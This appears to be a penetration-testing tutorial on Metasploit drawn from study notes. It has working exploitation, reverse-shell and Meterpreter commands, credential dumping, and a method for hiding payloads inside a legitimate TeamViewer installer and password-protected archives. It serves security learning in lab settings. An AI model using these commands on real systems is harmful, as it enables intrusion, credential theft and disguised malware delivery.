Introduction

Metasploit is a modular penetration testing framework that lets you enumerate, exploit, and manage access using a single console. The framework provides thousands of modules, payloads, and helpers, which can save time when used with discipline. This post blends theory and commands to help you use Metasploit as a tool, not a crutch.

The core idea is simple: use Metasploit to validate real vulnerabilities, not to replace your understanding of the system. A tool can give you a shell, but only your analysis decides which module is safe, relevant, and appropriate. If you treat the framework as a workflow engine, it becomes both efficient and transparent.

Mindset and Tool Discipline

Tools can create tunnel vision, and that is a risk in real assessments. Time is always limited, so you must prioritize findings that matter and are easy for clients to fix. Keep your ego out of the workflow and focus on verification and evidence.

Key reminders that keep your testing grounded:

Tools are helpers, not a replacement for protocol knowledge.
The goal is validated risk, not impressive output.
Every module has side effects and leaves traces.

Framework Layout and MSFconsole

Metasploit is organized into modules, plugins, scripts, and tools, and each area has a specific purpose. Knowing where things live helps you troubleshoot, extend the framework, and avoid confusion during long sessions. This also helps when you install custom modules or plugins.

# Modules, plugins, scripts, and tools
ls /usr/share/metasploit-framework/modules
ls /usr/share/metasploit-framework/plugins
ls /usr/share/metasploit-framework/scripts
ls /usr/share/metasploit-framework/tools

The entry point is msfconsole, which gives you a central shell for search, exploit configuration, and session handling. Use -q when you want a clean prompt and faster startup. The help command is your shortcut to every internal feature. Keep it close, especially when you forget syntax or options.

msfconsole
msfconsole -q

help

Reading Nmap Output for Better Searches

Enumeration is only useful if it leads to the right module search. A common mistake is to search for generic service names instead of the actual application. Nmap output often contains three valuable clues: the service, the server header, and the application title.

Here is a pattern you can use to guide your searches:

SERVICE / VERSION tells you the protocol and platform context.
http-title often reveals the actual application name to search.
http-server-header helps you confirm the backend stack.

PORT     STATE SERVICE  VERSION
5000/tcp open  http     Microsoft HTTPAPI httpd 2.0
|_http-title: FortiLogger | Log and Report System
|_http-server-header: Microsoft-IIS/10.0
Service Info: OS: Windows

If the title shows FortiLogger, search for that exact product name in Metasploit or Exploit-DB. Searching for “http” or “iis” alone usually produces the wrong results. This mindset saves time and makes your module choice more accurate.

Module Discovery and Execution Flow

Modules are organized by type, OS, service, and name, which helps you understand what they do before you run them. This structure makes it easier to filter searches and pick safer modules. The most common types are auxiliary, exploit, payload, post, and encoder.

The search system accepts filters like type, platform, rank, and CVE. Use show options to see required fields, and info to read the module notes and reliability details. Always set RHOSTS and LHOST explicitly to avoid silent mistakes.

help search
search eternalromance
search eternalromance type:exploit
search type:exploit platform:windows cve:2021 rank:excellent microsoft

use exploit/windows/smb/ms17_010_psexec
show options
info
set RHOSTS 10.10.10.40
setg LHOST 10.10.14.15
run

A module is only as good as its configuration, so read the options carefully. The setg command is useful when you work on a single host and want persistent values. If a module has multiple targets, check them before you run the exploit.

show targets
set target 6

Targets and Payload Strategy

Targets map an exploit to a specific OS version or configuration. If you select the wrong target, the exploit can fail or crash the service. Use show targets and match it to your enumeration data. When in doubt, test a safer target or use automatic selection.

Payloads define what happens after exploitation, and Metasploit groups them into singles, stagers, and stages. Singles are self-contained and stable but often large, while stagers are small and reliable. Stages add advanced features such as Meterpreter and are delivered after the stager connects.

Common payload selection flow:

Use show payloads to see compatible options.
Filter with grep for platform and connection type.
Use set payload <index> after choosing the exploit.

show payloads
grep meterpreter show payloads
grep meterpreter grep reverse_tcp show payloads
set payload 15

Meterpreter is a memory-resident payload that provides a powerful post-exploitation interface. It uses reflective DLL injection and encrypted communications, which reduces disk artifacts. You should still plan for logs and process telemetry.

Once you land a session, use help to explore available commands. Start with navigation and context checks like getuid and sysinfo. If you need a native shell, use shell to drop into the OS CLI.

help
getuid
cd Users
ls
shell

Encoders, MSFvenom, and AV Reality

Encoders change the payload shape to avoid bad characters and improve delivery. They are not a reliable bypass for modern AV on their own and should not be treated as stealth. If you need to test detection, use a service like VirusTotal with a dedicated API key and follow your engagement rules.

MSFvenom is the payload generator used outside the console. You can create raw shellcode, executables, and web payloads, then deliver them through the path you control. The goal is functional delivery, not flashy obfuscation.

# Raw payload
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

# Encoded payload
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

# Choose encoder in msfconsole
msf6 > show encoders

# Submit to VirusTotal (only with permission)
msf-virustotal -k <API key> -f TeamViewerInstall.exe

Database and Workspace Management

Metasploit can store scan results, services, and credentials in a PostgreSQL database. This helps you avoid repeating scans and keeps evidence centralized. Always initialize the database and verify connectivity before starting a large engagement.

The key commands are simple: check PostgreSQL, initialize msfdb, and then run msfconsole with database support. You can import Nmap XML data, run db-aware scans, and export results for backup. Keep the database tidy so your searches stay meaningful.

sudo service postgresql status
sudo systemctl start postgresql
sudo msfdb init
sudo msfdb run

workspace
workspace -a Target_1
workspace Target_1
workspace -h

# Import and scan
 db_import Target.xml
 db_nmap -sV -sS 10.10.10.8

# Review and export
hosts
services
creds -h
loot -h
 db_export -f xml backup.xml

Sessions and Jobs Management

Sessions are the live channels you control after exploitation. You can background them with CTRL+Z or background, then return to them with sessions -i. This lets you keep multiple footholds alive while you explore other modules.

Jobs are background tasks that keep running even when you switch modules. Use exploit -j to run handlers or scans without blocking your console. You can list jobs, stop them, or kill them all if a port is stuck.

# Sessions
sessions
sessions -i 1
background

# Jobs
jobs -h
exploit -j
jobs -l
jobs -k 0
jobs -K

End-to-End Example Workflow

A clean workflow starts with enumeration, then moves to exploitation, and ends with post-exploitation checks. This example uses FTP and a web root to trigger a Meterpreter payload, then escalates locally. Adapt the flow to your target and avoid assumptions about versions.

# Recon
nmap -sV -T4 -p- 10.10.10.5

# FTP access and upload
ftp 10.10.10.5
ls

# Generate an ASPX payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=1337 -f aspx > reverse_shell.aspx

# Handler setup
msfconsole -q
use multi/handler
set LHOST 10.10.14.5
set LPORT 1337
run

# Post exploitation flow
search local_exploit_suggester
use post/multi/recon/local_exploit_suggester
set SESSION 2
run

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 3
set LHOST tun0
set LPORT 1338
run

getuid
hashdump
lsa_dump_sam
lsa_dump_secrets

Plugins and Custom Modules

Plugins extend msfconsole with external integrations and extra automation. If a plugin is present in the default directory, you can load it at any time. Keep plugins updated and only load what you need to reduce noise.

Custom modules let you extend Metasploit with your own exploits or ported code from public sources. The main task is placing the file in the correct path and ensuring the naming convention is clean. You can use loadpath or reload_all to force msfconsole to recognize new modules.

# Plugin management
ls /usr/share/metasploit-framework/plugins

load nessus
nessus_help

# Custom module install example
cp ~/Downloads/9861.rb /usr/share/metasploit-framework/modules/exploits/unix/webapp/nagios3_command_injection.rb

loadpath /usr/share/metasploit-framework/modules/
reload_all
use exploit/unix/webapp/nagios3_command_injection

If you plan to write your own modules, study Ruby mixins and reuse existing module structures. The core pattern is a class that inherits from Msf::Exploit::Remote, includes mixins, and registers options. Once the module loads, it behaves like any other Metasploit module. This is a good way to standardize custom exploits across a team.

IDS-IPS and Evasion Notes

Firewalls filter connections, while IDS and IPS inspect traffic for known patterns. An IDS alerts, while an IPS can block your source, so repeated scans can quickly lock you out. This is why quiet timing, precise targeting, and staged workflows matter.

Metasploit can tunnel Meterpreter sessions with AES and keeps the payload in memory, which helps against some network detection. The larger risk is the payload file before execution, which AV can scan. One mitigation is to embed payloads into legitimate executables or to archive them with passwords, which changes the file signature.

# Template injection example
msfvenom windows/x86/meterpreter_reverse_tcp LHOST=10.10.14.2 LPORT=8080 -k -x ~/Downloads/TeamViewer_Setup.exe -e x86/shikata_ga_nai -a x86 --platform windows -o ~/Desktop/TeamViewer_Setup.exe -i 5

# Archive and double-archive approach
wget https://www.rarlab.com/rar/rarlinux-x64-612.tar.gz
tar -xzvf rarlinux-x64-612.tar.gz && cd rar
rar a test.rar -p test.js
mv test.rar test
rar a test2.rar -p test
mv test2.rar test2

Reference

This article is based on my personal study notes from the Information Security Foundations track.

Full repository: https://github.com/lameiro0x/pentesting-path-htb

Introduction#

Mindset and Tool Discipline#

Framework Layout and MSFconsole#

Reading Nmap Output for Better Searches#

Module Discovery and Execution Flow#

Targets and Payload Strategy#

Meterpreter Interaction and Navigation#

Encoders, MSFvenom, and AV Reality#

Database and Workspace Management#

Sessions and Jobs Management#

End-to-End Example Workflow#

Plugins and Custom Modules#

IDS-IPS and Evasion Notes#

Reference#